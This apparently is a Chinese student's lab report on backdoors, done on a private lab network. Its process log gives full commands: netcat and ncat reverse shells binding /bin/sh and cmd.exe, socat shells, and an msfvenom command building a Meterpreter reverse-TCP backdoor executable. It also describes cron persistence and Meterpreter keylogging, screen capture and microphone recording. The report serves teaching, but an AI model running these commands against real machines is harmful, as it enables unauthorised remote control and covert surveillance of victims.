20145316許心遠第二次實驗《後門原理與實踐》

20145316許心遠第二次實驗《後門原理與實踐》

基礎問題回答

1.例舉你能想到的一個後門進入到你係統中的可能方式?

  • 從網絡上下載來路不明的盜版軟件、壓縮包,還有一些小視頻……linux

    2.例舉你知道的後門如何啓動起來(win及linux)的方式?

  • 雙擊打開。
  • 取得shell後遠程直接執行後門這個可執行文件。shell

    3.Meterpreter有哪些給你映像深入的功能?

  • 感受它超級強大……每一個功能都很讓我印象深入!開攝像頭,看界面,錄音頻……徹底沒有任何隱私可言啊。windows

    4.如何發現本身有系統有沒有被安裝後門?

  • 若是翻看任務管理器時,機器內存佔用很是嚴重,關掉主要應用程序仍是有佔用,任務裏有並不認識的exe程序,那頗有可能就是被安裝了後門。bash

    實驗總結與體會

  • 我的感受此次實踐比上次還有趣,尤爲是後門被激活後,meterpreter的功能一經展現出來,簡直被震驚。若是未開啓防火牆,或防火牆不夠高級,所謂監聽、隱祕偷拍居然是這麼垂手可得的事情。
  • 實驗過程總的不難,但也遇到了很氣的部分。由於本身的疏忽忘記關防火牆(我覺得本身關掉了),致使在win10系統內一直沒法激活那個後門程序,後來換了xpattacker靶機也不能夠,提示什麼「不是win32文件」。總之,很糾結,浪費了兩個小時,好在在武鈺等同窗的提醒和幫助下,找到了問題,攻克後,後面就比較簡單了。
  • 由於我是win10系統,自己存在必定的堅固性,因此最後的提權暫時沒作出來,準備以後本身再按個虛擬機或者借同窗的win7系統完善一下。網絡

    實踐過程記錄

    windows得到linux的shell

  • 爲windows系統安裝ncat軟件,我安裝在了C盤根目錄下了。
  • ipconfigifconfig指令分別查看windows主機和kali虛擬機的ip地址。分別爲kali:192.168.234.140 windows:172.30.0.152

  • windows下使用如下命令ncat.exe -l -p 5316監聽
    kali下使用nc 172.30.0.152 5316 -e /bin/sh反彈鏈接windows

  • windows得到linux的shell
    tcp

    linux得到windows的shell

  • linux主機使用nc -l -p 5316命令於5316端口進行監聽
  • windows主機使用ncat.exe -e cmd.exe 192.168.234.140 5316命令經過5316端口反彈鏈接linux主機
  • linux得到windows的shell
    3d

    啓動cron

  • 在linux終端下使用crontab -e命令修改用戶的cron配置,彈出一個vi界面
  • 修改部分以下
  • cron啓動成功
    code

    windows利用socat獲取kali的shell

  • kali上用socat tcp-listen:5316把cmd綁定到端口5208
  • 同時用socat tcp-l:5316 system:bash,pty,stderr反彈鏈接
  • windows使用socat readline tcp:192.168.234.140:5316開啓監聽
  • 成功,用ls檢驗視頻

    meterpreter獲取主機shell

  • linux使用命令msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.234.140 LPORT=5316 -f exe >20145316.exe來生成後門程序,而後發送到windows機中。
  • windows輸入指令ncat.exe -lv 5316 >20145316.exe
  • linux使用命令ncat -nv 172.30.0.152 5316 < 20145316.exe傳送後門程序
  • 在windows主機ncat文件夾下查看是否有後門文件植入
  • 使用msfconsole命令開啓msf進行設置
  • 監聽開始,在windows雙擊20145316.exe運行後門程序,實現遠程控制

    blog

    meterpreter實現特殊功能

  • 查看主機文件夾信息
  • 獲取靶機屏幕截屏

  • 記錄靶機擊鍵記錄
  • 調用靶機麥克風,錄製音頻文件
  • windows上任務管理器能夠看到後門正在運行

相關文章
相關標籤/搜索